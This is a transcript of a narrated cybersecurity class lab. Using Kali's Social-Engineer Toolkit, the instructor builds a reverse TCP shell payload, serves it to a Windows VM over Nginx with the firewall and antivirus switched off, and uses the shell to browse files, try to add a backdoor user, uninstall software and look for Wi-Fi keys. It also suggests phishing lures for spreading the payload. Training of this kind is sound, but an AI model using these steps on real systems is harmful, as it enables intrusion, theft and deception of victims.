So my Linux operating system is up. So I input my password, my username and password. So you should run this on your system. So I have two operating systems. This is my host target. That's my Windows target. This is my Kali Linux. So before I proceed, let me verify the connection between this my Linux and my Windows. So my Linux is on VMnet 0. Then my client is, let me verify what's my so I'll move to network adapter VMnet 0. Okay, so my client is also on VMnet 0. So the next I'll do is to assign IP address to this operating system, both operating systems, on the same network segment. So I click on my Linux and check the IP address set. So my IPv4 I have 20.2 assigned to my Linux OS. So just let me start. So this is my Linux, and so first thing let me verify if main same is sharing same. I do an if config. So if you observe, my Linux IP address here is you can see here 20.2. Now let me check my target host, my host target. Same thing on my Windows. So Windows R CMD, okay. And on Windows is IP config space / all. So if you observe, my Windows is 20.1. So I'll ping my Linux. So ping 192.168.20.2. So there's connection. So there's connection between my Linux and my Windows host client. So the next thing I have to do is to call up my root. Okay, so my Linux, let me ping my Windows operating system. So my Windows operating system IP is, so I ping 192.168.20.1. So like I told you on Linux, if you don't want this continuous ping, you use, so let me clear my screen. So clear, so I told you do ping C 192.168.20.1 and want this to run. No, sorry, I think I made a mistake with the command. It's supposed to be here. So I want this ping command to run just 4 times. So that's what this command does. So I'm going to call up my root terminal. The essence of calling on my root terminal is so that I don't use the sudo command. The super user do. That's what sudo means. So password on my root password. And then, so take note of my Windows client. If you observe there's a communication here. There's also a communication here. In a situation whereby your Linux can gain access to your Windows, you should know that firewall is enabled. So all you need to do is probably, because it's just for practice, it's probably to, on your search that's on your client OS, you could just do Windows firewall. When this pops out, then you up Windows firewall. So why this is loading up? Sorry for I'm running so many instances on my machine. So sorry for the. You just have to bear with me on this. So I'm running so many instances. So let me go to my client, and then okay. So you see, my firewall is off. So you could at times you try to access your Windows operating system. You see, it's off. So you could do this on the turn Windows firewall on or off. So that's why I did this. If you don't turn firewall off, your firewall could prevent your Linux OS from actually accessing your Windows via ICMP or other ports opened. So I'll do a command set to kit, and then hit. As you see, I'm on my Linux OS. So I'm going to run. Remember, this lab is. I told you what this lab is. This lab is how to establish a reverse TCP shell on Windows target using the set2 kit. So the first command I imputed was the set2 kit command. So I'm on the interface. So I want to carry out a social engineering attack. So I have the one option. Then I wait for this to come up. Then I select the 3. I want to run an infectious media generator. So I'll impute option 3. Then I want this to be a standard Metasploit executable. I want to create a payload that I will launch into my Windows client. So I'll select the 2 option. Then take note, I told you what this lab is all about. It's about creating a reverse TCP shell on Windows. So I'll impute 1, and then it's asking me IP address for payload listener. So when this payload is installed or is launched or is planted into the Windows target, it's like a question, where do you want me to, who is going to listen to all these sessions? So my target is Windows, and I'm using my Kali Linux as an attacker. So my Kali Linux IP address, it's going to be imputed here. So when I run the if config, so just in case so you don't make any error here, you could actually run the if config to get your Linux IP. So if you observe, my Linux IP is this 192.168.20.2. So I'll return back to my root and I'll impute this here. So 192.168.20. hit and enter. So it's asking me what reverse port. So I'm going to use 3222. It's my reverse port. So you see generating possibility that I might get an error because I might get an error if a binding error if this port is already in use. We discussed this in class. So if I get a binding error, I'm going to show you how to correct the error. So it's asking me create a listener right now. Just say yes. So I'll say yes. Remember, the essence of this exploit is I want to create a payload, and I told you what a payload is in our class yesterday. I told you a payload is probably it's like a malicious software that you just plant in the target. So I want to create something malicious that I will plant in my Windows target. So that's what this particle is all about. So why this is on, just to be on a safer side, let me check if, so you see it's creating the Metasploit configurations for you. So I didn't get any error. It's telling me, so when you get this telling you exploit completed, started the reverse TCP handler on this, it means that the reverse shell has started. But right now the reverse shell is stored in a folder called the roots.set folder. So how do you get to this folder? Because that's where it's created the payload, but the payload is there now. Our job is to launch this payload into our Windows target. So what we have to do right now is to, so why this terminal is up? This terminal is up. I would call up another terminal. So I'll call up another terminal. So sorry, just so let me cut this and then I'll display to you the next step. Okay, so let me just check if it's, I want to cut up. Let me input my password. Okay, so no need to cut it. Let me continue. So password at 1 for my practice. Okay, so I have another root terminal here. So if, for example, you had gotten an error message here telling you binding error. Now, binding error basically means that the port it's used by another service. So assuming I got that message, I had gotten a binding. Binding means that this 32222 it's being used by someone else. So if I get that kind of error, you have to do something. You'd have to verify who is using that port, and the only way you could verify that is you call up your root and then you type this command is called the list file command. So you say the lsof, and you do a -i, and then you do a colon. I want to check if that port is available. So I'll do a 3222. So you see, I believe this what you're seeing here, it's basically what I just did. So this is also how you verify if what you've done is fine. So if you check out the last part where you have name, you see 192.168.20.2 mapped to 3222. If you observe, is on listening. So you've started up the listener. So if, for example, I want to use this 3222 port for something else, I will have to stop this port, right? I'll have to stop this port here. So meaning that I want to stop this port from being mapped to 20.2 for whatever reason it's mapped for. So if I want to do this, I have to kill this PID, right? So if, for example, I want to stop this, or maybe I'm getting a binding error there, I would get here and type kill, then I type the PID number. So the PID number there is 7192. So if you hit enter, it's going to kill the process automatically, but I'm not killing my process because I just started this. So the next thing I'll do is, I'm on route right now. I want to get to this to the payload to check out if the payload.exe has been created. So while I'm en route here, I'll type cd, and then I'll use the /root /set to get in the so you see I'm on this directory. So if you type the ls command, it's going to list all directories in this directory. So if you observe, I have the payload.exe, so it's created here already for me. So what I have to do right now is to you could also do ls to list them in kind of an organized format. So you see, still same thing. So what I want to do right now is I want this payload.exe file to be uploaded to my client. So that's the because by default what I'm supposed to do is to copy this file to a flash drive, and then copy this file to a flash drive and then send it to the Windows client. But you could do something. You could network clients to this set, right? So you wouldn't have this stress of probably trying to pull this out. So what we're going to do is we're going to create a web server, and then point that web server to this payload.exe. So when you look in my client between my client and my Kali Linux server, I want the situation if my client keys in the IP address of my server, like I want to convert this I want to start up a web service feature on my Kali Linux, so my client can actually point to him and download it directly instead of copying to flash. And so just for practice, what I have to do right now on my client, before I do this, I would let me try something. So I'm on my client right now, so let me call up a web browser, so Microsoft Edge. Remember, I have a link already, so let me do http colon / the IP address of your server, so 192.168.20.2 /payload.exe. This is what we want to achieve. So enter, hit and enter. By default you get an error because there's no, if you observe, you say can't reach this page, make sure you've got the right web address. So why it's giving me this error is because the Kali Linux server, it's not a web server yet. So let me start up the web server feature on my my Kali Linux operating system. So let me just let me start this up. So I'm on my Linux right now. So there's only one very important thing you could do. So what you do is to start up a service that is called the Nginx, right? So I'll start up that web service. So to start that up, I will do I'll do a mapping first to this payload.exe, so that it's basically, the mapping is basically, I want to map this to that Nginx server. But to be on the safe side, so that I don't make an error, you first verify, because starting up a web server, the web server will be running on port 80, that's HTTP port 80, So starting this service up, before I start it, I want to check if Apache, by default Linux uses an Apache service, So I want to verify if port 80 is being used by maybe another web server or something. So what I'll do an lsof -I, then I'll do colon port 80, then I'll hit an enter. So I didn't get, so it means that port 80 it's available for use. So I'll start up the command now. So the command, I'll say sudo cp, I told you cp is copy -v /root /.set /payload.exe. I want it to be mapped to my web server. So that's a web service, the var, that's the web service directory. That's var www html. Yeah. So as you can see, this it's an indication that it's mapped, right? So it's mapped right now, but I have to start the Nginx service, so this can be launched into it. So I want a situation whereby my client, if they just key in the IP address of the server and then that file or whatever file automatically, the server automatically gain access to it. It's like browsing the file. So this is the first thing you do. Then you start up the Nginx. So this is sudo Nginx. So the Nginx has been started. Now if you want to verify if what you've done is actually okay or perfect, you will use that command, the lsof -I and colon 80. I want to verify if what I've done is it's fine. So if you observe, you see that Nginx has been started, and if you also observe, you see there's a PID assigned to it, 12670. Then if you also observe, you see TCP, then you see HTTP, so meaning that the HTTP protocol has been started here. So we officially have a web service. So at this instance, you go to remember why I'm running this. I still have my my set toolkit, like my exploit, still here waiting for me. If you observe, it's saying no session started. So remember, this window, you have to keep this window on. So right now I'll go to my client to download this this payload.exe file, and then see if a session will start up. Click on my client, and then I'll reload this. But before we're running we're running an exploit, and when an exploit means you're trying to exploit a client or like a host. So we have to turn off our what do you call it? We have to turn our antivirus. So because your antivirus definitely is going to see this man as a virus. So like mine is on the virus and threat protection. So I'll just say manage settings, and this real-time protection, I'll just turn it off. And saying this, so I'll just say yes. So if you want to launch this to a host target, maybe for penetration testing, you have to construct, you have to make a very good construction so that your client or the host will have to download the file. You could make a construction, a phishing construction, like, hello, please download this file to get 40% discount. I'm telling you how they normally phish they phish targets. So the hacker will impute a draft message like, hello, please download this file, turn off your antivirus, else you won't be able to install it, that kind of message. So this is what they do. So I'm here right now, so I'll just refresh my I'll refresh to see if there's now a connection. So you see down here, you see want you to download payload. So you could either save this payload or you could run it directly, right? So before I run this, let me go to my Linux client. You observe that you see there's nothing started here yet. I'm talking about this part. There's nothing started here yet. here is just, but you observe this, and that's how the hack is done. So if the client has not run this or hasn't downloaded it, even though the client downloads, that's what I've been telling, that's what I've been saying in class. When you download an antivirus, the antivirus is just there. It's passive, it's dormant, just there. But immediately you install it on your machine, automatically the malicious software starts working or start running or it starts executing some commands. So I'll just run this. So I click on run, and then so I'll just wait for the notification to pop out. So if you observe, it's saying this, check your internet connection, blah. So it does say run, and then so this always happens when you download software. So you see, nothing happens again. And you'll be wondering, but I just clicked on run. How come the software is not installing? Okay, nothing. You wouldn't know that at that time you say nothing. Your system has already been infiltrated. I Kali Linux, and then you check. So you see, it's saying command shell session 1 opened, and it's giving you the IP address of the client that opened it. And you see, you see this arrow here pointing to 192.168.20.1. So it's actually sending through this port. It's sending whatever that the client is doing to your server, right? So at this instance, I would so this is where I do work. Now this Windows client doesn't know what is happening on this machine. So at this point here on this client, I will start up something. So if you observe, session 1 opened on so client. So I'll say, let me check if there's anything important. If you check out my client has some let me close this. On my client desktop, you observe there is just these little things. Now let's say I have something very confidential here. So let me say note pad. Let me just type something, and then I'll call this credit card info, right? So I'll just so let's assume that this credit card was saved on your okay, let's say it's saved on your document. You know, some persons that save sensitive things on their document. Remember on cybersecurity, the CIA triad that talks about confidentiality, integrity, and availability. So right now, this client, I've gained access to this client. So now, how do I start the work? So I could start this up. There are other commands too you could use to know about your Nginx server. You could maybe you've actually run this and you want to verify if what you've done is actually working. You could also use this command to check your the status of your Nginx server. So you say status system ctl, and you say you space it, and then impute status, then you say Nginx. Oh, sorry. Let me check if this command. Okay, I think I made an error. So the command is supposed to be the command I'm supposed to use that. So this other command. So you say high performance web server and reverse proxy. So you could actually use this man as a proxy server. So I think when we get to proxy server, we'll talk about that. So you see active, you have this inactive, but I think these are other services that you could actually find on the Nginx. Now, what if you want to stop this service? Maybe you're done with using Nginx, you want to stop it. You could do sudo system ctl, then you say stop Nginx. If you hit and enter, it's going to automatically stop the service. But you know, for the practice I'm not. So now let's go back to So I have session 1 open. Now how do I start this client, creating this client? So what I'll do right now is I will impute sessions space have an I. The session number is 1. So I do mean there are 1,000 persons that have downloaded that file, that software. That's what hackers they do. If I want thousands of persons to actually download it and me to have access to their machine, I could actually host a fake website, and then on the fake website I could actually make an input and say, please download this file for so, download free antivirus. I could actually change the name of this payload to something else. I could rename it to something else, and then I dump it there. And then if, let's say, 100 persons they download and run the software, I will see all those 100 persons as 100 sessions with their different IP addresses. So if, for example, I want to gain access to maybe 192.168.10.5 and it has session 10, I'll just impute sessions-i, then I impute the session number. So for this particular, I'll have that I've done clients that have downloaded it, which is this client 101. So I'll just hit and enter. So if you observe, I'm now on the client saying users, client, app data, whatever. So let me do a cd /. I'm now on the C drive of this client. So if you do a dir, it will give you the directory list of what this client has. So I'll do cd users, right? So I'm in the users container. I'll do dir. Then I logged into this client as let me check. I logged in this client as you see, I logged in this client and I saved the credit card on the document. So let's see if we could get the credit card. So I'll say cd client. I'm now on client directory. Then I'll say I still want to check what client has. So I want to get in that man called document. So I'll say cd document, right? So and I'll say dir. So you see that credit card is here, credit.exe, the one I saved on the client, the credit card I saved on the client's PC. So let me display to you what. So let me cut this video, and then when I come up, I will show you other commands. I'll leave this session open, probably how many minutes left? Okay, I think we'll continue. So I have different so let me go to this client and verify if this client so let me go to this client desktop. So if you observe, if you click on documents, I have this credit here. So this file called credit. So if you observe, I now have full I have control over this client's PC. There are so many other things you could actually do. So now let's try to see if we can access Reddit. So what I'll do is on my Linux, I will do so I will say credit.exe. So I just clicked on that file, and if you see, it just opened on the client machine, right? So I think maybe there are times you'd now on this client machine, there are some things you could detect. So let me go to Task Manager and more details. I'm on the client now. Let me see if I could detect any malicious program. So let me scroll down, see if there's anything running that looks malicious. Let me just search for malicious on my client. So I'm just trying to check if there's any malicious thing displaying on okay, so let me check. Okay, these are Windows process, and the good thing about it is that you're not even detecting anything, because some of you I'm supposed to get an autorun.inf here, but it's so okay, I think we'll look at that later on. So there are other commands you could use. You could use let me check if I could add a user. So let me do cd like add a backdoor user. Let me see if I could on Linux you do a cd space ... to go a step back. So I'm on users now. So let me say if you want to know the users down this container, I say net users. So you see I have it's telling me I have this man called Clint is an administrator. So these are all the accounts that are running on this machine. So let's assume I want to add a user. So I say net user. Let me say hack T. And let me say pass 1 space / add. Okay, okay, give me a denial error message. So I'll crack on solving that. So let me look at let me you can remove a user. Let me try to remove. Okay, I don't think. Let me look for other commands I could use. You could use this system info. I think this opened on the client. Okay, so you observe these are informations about the target machine. If you observe, I can see it's running the Windows 10 Pro and some other things about this user. Let me check the user's tax list. You can also see all the tags that are running on this. When we say tags, we mean all the services that are running on this machine. So let me check the time. So say net time. Okay, could not locate because of I think because of internet connection. So so I think these are some things you could actually do on this machine. So if you see, there is you see this is a Payload.exe running on the machine. with a PID. So I want to get this. I want to get this on the machine. So let me go to services, and these are default Windows services. So these are just little things you could actually get. Then then you could so you can actually use a Linux operating system to find out so many things about a system. So if, for example, now I want to stop this Payload.exe on this machine, the question, how do I do this? I could do a tax kill F space the PID. The PID of this Payload.exe, if you observe, is 448. So I'll say 4448. I'm sorry, the command is supposed to be PID and 4448. So if I hit and enter, it's going to automatically stop this service from running. So those are the, these are little this thing you could actually see on this machine. You could do you could actually view system logs of this machine. So if I'm the network administrator of a company and I want to find out, oh, what is happening to Nginx. Let's say I have a user in my firm that's a client that happens to be a member of staff named Nginx, and there's always issues happening on Nginx's machine. I've logged in using Kali Linux. Now I want to check out what are the logs. So if you observe, I have event log files of things I could view on Nginx's machine. You could also, if I want to know where's that I install in this machine, is host. I want to know, okay, let me check if Nginx, because we made a we broadcasted an info, a very important security info. Shouldn't do any installation on their machine, and let's say some users did some installation. Now I want to find out if there is, I want to find out all the softwares that are installed in this machine. So I could actually use this command to get the installed softwares. So it's actually trying to, let's wait for, so you see, these are all softwares that are installed in this machine remotely. So I've not really installed much, both the ones installed by Microsoft and the ones installed by the user. So you see, so you see, I've only installed Microsoft Visual C++ and this. So these are the only two softwares installed. Now if you observe, I specified I want the product. I also want to get the name of this software, and I also want to get probably the version. So that's the value you have here. So this is how you get softwares you want to pull out. Then if, okay, I also have VMware Tools is also a software. Now let's assume I want to uninstall a software remotely from this machine. You use this command wmic, you say product, you now say where name, you now specify the name of the software. So it's VMware tools, right? So VMware tools, then, and I'll use call is a command, call on install. So I want to do an installation. So I say this is command interactive, and I say off. So let's see if it's going to pull this software. So it's uninstalling VMware tools. I want him to, so you say uninstall Y or N. So I'll say Y. Before let me go, you verify I'm on the client right now. I would go to control panel. It's only you verify install softwares on control panel. So I'll go to control panel, I'll click on open, and then I'll go to programs and features, and you see the VMware tools here on this. I'm on the client right now, and these are the software listed. So now let's accept this command, Y for yes to uninstall. So I've done the Y, and let's see if it's going to pull this. Let's wait. Let's see if it's going to pull this software on this machine. So let's just verify. So you say method execution successful. So let's check if the client have it. So let me go back and return here again and see if that software is still. If it's not there, I would have to restart. The machine or something. So I know if you restart the machine, it's going to. You're going to see that this VMware tools is pulled out. So it's pulled out. So this is how you uninstall you uninstall remotely on this thing. Then you want to find let's say for example used Wi-Fi. Maybe he's connected to Wi-Fi on several instances, and then I want to know the password that this man has been entered on all Wi-Fi he has visited. I could use this command called the netshow wlan to say show profile. So this is another command. You say the wireless autoconfig service is not running. So I think why it's giving me this command is because this is a VMware client. If you observe, there's no wireless here. So if I had logged into several wireless networks, you would definitely have seen that command. You also have other commands. You also have some other commands like you could shut down a system remotely, or if you impute the wireless IP you get the wireless network this client has connected to in the past, but now the wireless passwords are encrypted. You're not able to see them. You could actually view them on clear text. So you could use this command. You could use the netshow wlan. You know what WLAN is? WLAN is wireless LAN, and you say show profile. Then you now impute SSID, and you see key is definitely equal to clear. Okay, section 1 closed. So I just had to stop this up. So let me I would restart this client machine, and then this hasn't come up because the system has to restart. Then so it's basically how you you gain access to a machine remotely, and then get all you have to. So